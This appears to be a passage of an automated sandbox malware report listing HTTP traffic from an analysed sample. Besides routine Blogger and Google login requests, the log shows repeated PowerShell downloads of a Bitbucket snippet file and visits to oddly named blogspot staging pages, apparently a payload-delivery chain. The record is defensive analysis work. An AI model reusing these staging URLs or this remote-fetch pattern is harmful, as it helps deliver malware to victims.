                      Source: global trafficHTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://randikhanaekminar.blogspot.com/p/ayoola.html%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://randikhanaekminar.blogspot.com/p/ayoola.html%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1Accept: */*Referer: https://randikhanaekminar.blogspot.com/p/ayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: accounts.google.comCookie: __Host-GAPS=1:c9BBumwINGgbKZmhvCsmcJwIqGnQ7A:dvQQZbHicFDLQc5k
                      Source: global trafficHTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Frandikhanaekminar.blogspot.com%2Fp%2Fayoola.html&type=blog&bpli=1 HTTP/1.1Accept: */*Referer: https://randikhanaekminar.blogspot.com/p/ayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.blogger.comCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
                      Source: global trafficHTTP traffic detected: GET /css/maia.css HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Frandikhanaekminar.blogspot.com%2Fp%2Fayoola.html&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google.comIf-Modified-Since: Mon, 25 May 2020 08:30:00 GMTConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /analytics.js HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Frandikhanaekminar.blogspot.com%2Fp%2Fayoola.html&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google-analytics.comIf-Modified-Since: Wed, 11 Aug 2021 00:32:57 GMTConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: bitbucket.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /p/ayoolaback.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: backbones1234511a.blogspot.com
                      Source: global trafficHTTP traffic detected: GET /js/cookienotice.js HTTP/1.1Accept: */*Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: backbones1234511a.blogspot.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=7680886694920034828&zx=ad70dca0-0e6f-4ddf-9917-2cf3a06acb70 HTTP/1.1Accept: */*Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
                      Source: global trafficHTTP traffic detected: GET /blogin.g?blogspotURL=https://backbones1234511a.blogspot.com/p/ayoolaback.html%2522&type=blog HTTP/1.1Accept: */*Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
                      Source: global trafficHTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://backbones1234511a.blogspot.com/p/ayoolaback.html%252522%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://backbones1234511a.blogspot.com/p/ayoolaback.html%252522%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1Accept: */*Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: accounts.google.comCookie: __Host-GAPS=1:6n9HeR7EpH_BLBfBK28oPhchLN3ckw:TftEdtH5NeRlJzNf
                      Source: global trafficHTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Fbackbones1234511a.blogspot.com%2Fp%2Fayoolaback.html%2522&type=blog&bpli=1 HTTP/1.1Accept: */*Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.blogger.comCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
                      Source: global trafficHTTP traffic detected: GET /!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: bitbucket.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /css/maia.css HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fbackbones1234511a.blogspot.com%2Fp%2Fayoolaback.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google.comIf-Modified-Since: Mon, 25 May 2020 08:30:00 GMTConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /analytics.js HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fbackbones1234511a.blogspot.com%2Fp%2Fayoolaback.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google-analytics.comIf-Modified-Since: Wed, 11 Aug 2021 00:32:57 GMTConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /p/backbone16.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: startthepartyup.blogspot.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /js/cookienotice.js HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: startthepartyup.blogspot.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=9027821174359424672&zx=2c5db057-0ce4-4fb6-885f-019691b40909 HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
                      Source: global trafficHTTP traffic detected: GET /blogin.g?blogspotURL=https://startthepartyup.blogspot.com/p/backbone16.html%2522&type=blog HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
                      Source: global trafficHTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://startthepartyup.blogspot.com/p/backbone16.html%252522%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://startthepartyup.blogspot.com/p/backbone16.html%252522%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: accounts.google.comCookie: __Host-GAPS=1:-UtK03aR6xcHYC2IsubUGy9SL5c4yw:nFWAkb4XQpFiUmZt
                      Source: global trafficHTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Fstartthepartyup.blogspot.com%2Fp%2Fbackbone16.html%2522&type=blog&bpli=1 HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.blogger.comCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
                      Source: global trafficHTTP traffic detected: GET /css/maia.css HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fstartthepartyup.blogspot.com%2Fp%2Fbackbone16.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google.comIf-Modified-Since: Mon, 25 May 2020 08:30:00 GMTConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /analytics.js HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fstartthepartyup.blogspot.com%2Fp%2Fbackbone16.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google-analytics.comIf-Modified-Since: Wed, 11 Aug 2021 00:32:57 GMTConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /p/ghostbackup15.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: ghostbackbone123.blogspot.com
                      Source: global trafficHTTP traffic detected: GET /js/cookienotice.js HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ghostbackbone123.blogspot.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=1690726786805467605&zx=1fe0aef2-8b4f-4693-89a0-5b335e695da7 HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
                      Source: global trafficHTTP traffic detected: GET /blogin.g?blogspotURL=https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%2522&type=blog HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
                      Source: global trafficHTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://ghostbackbone123.blogspot.com/p/ghostbackup15.html%252522%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://ghostbackbone123.blogspot.com/p/ghostbackup15.html%252522%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: accounts.google.comCookie: __Host-GAPS=1:5Vg_RjDpt6AvPfyva6KZpJ4lF9qr6w:sp4m46I6qe_hSWA8
                      Source: global trafficHTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Fghostbackbone123.blogspot.com%2Fp%2Fghostbackup15.html%2522&type=blog&bpli=1 HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.blogger.comCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
                      Source: global trafficHTTP traffic detected: GET /css/maia.css HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fghostbackbone123.blogspot.com%2Fp%2Fghostbackup15.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google.comIf-Modified-Since: Mon, 25 May 2020 08:30:00 GMTConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /analytics.js HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fghostbackbone123.blogspot.com%2Fp%2Fghostbackup15.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google-analytics.comIf-Modified-Since: Wed, 11 Aug 2021 00:32:57 GMTConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: bitbucket.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /p/ayoolaback.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: backbones1234511a.blogspot.com
                      Source: global trafficHTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=7680886694920034828&zx=ad70dca0-0e6f-4ddf-9917-2cf3a06acb70 HTTP/1.1Accept: */*Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
                      Source: global trafficHTTP traffic detected: GET /blogin.g?blogspotURL=https://backbones1234511a.blogspot.com/p/ayoolaback.html%2522&type=blog HTTP/1.1Accept: */*Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
                      Source: global trafficHTTP traffic detected: GET /p/backbone16.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: startthepartyup.blogspot.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://backbones1234511a.blogspot.com/p/ayoolaback.html%252522%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://backbones1234511a.blogspot.com/p/ayoolaback.html%252522%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1Accept: */*Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: accounts.google.comCookie: __Host-GAPS=1:Hmt6ODuT1T9rHnbQAYn_Kn4-RIPtxg:emLdUalzCJuXb2hK
                      Source: global trafficHTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=9027821174359424672&zx=2c5db057-0ce4-4fb6-885f-019691b40909 HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
                      Source: global trafficHTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Fbackbones1234511a.blogspot.com%2Fp%2Fayoolaback.html%2522&type=blog&bpli=1 HTTP/1.1Accept: */*Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.blogger.comCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
                      Source: global trafficHTTP traffic detected: GET /blogin.g?blogspotURL=https://startthepartyup.blogspot.com/p/backbone16.html%2522&type=blog HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic | HTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://startthepartyup.blogspot.com/p/backbone16.html%252522%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://startthepartyup.blogspot.com/p/backbone16.html%252522%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1 | Accept: */* | Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22 | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Connection: Keep-Alive | Host: accounts.google.com | Cookie: __Host-GAPS=1:bo4Rzlac7OC6SQzizPuNFmoxcxmpHg:LWMGlJqI2wYq8ec8
Source: global traffic | HTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Fstartthepartyup.blogspot.com%2Fp%2Fbackbone16.html%2522&type=blog&bpli=1 HTTP/1.1 | Accept: */* | Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22 | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Connection: Keep-Alive | Host: www.blogger.com | Cookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic | HTTP traffic detected: GET /css/maia.css HTTP/1.1 | Accept: */* | Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fstartthepartyup.blogspot.com%2Fp%2Fbackbone16.html%2522&type=blog&bpli=1 | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: www.google.com | If-Modified-Since: Mon, 25 May 2020 08:30:00 GMT | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /analytics.js HTTP/1.1 | Accept: */* | Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fstartthepartyup.blogspot.com%2Fp%2Fbackbone16.html%2522&type=blog&bpli=1 | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: www.google-analytics.com | If-Modified-Since: Wed, 11 Aug 2021 00:32:57 GMT | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1 | Host: bitbucket.org
Source: global traffic | HTTP traffic detected: GET /p/ghostbackup15.html%22 HTTP/1.1 | Accept: */* | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Connection: Keep-Alive | Host: ghostbackbone123.blogspot.com
Source: global traffic | HTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=1690726786805467605&zx=1fe0aef2-8b4f-4693-89a0-5b335e695da7 HTTP/1.1 | Accept: */* | Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22 | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: www.blogger.com | Connection: Keep-Alive | Cookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
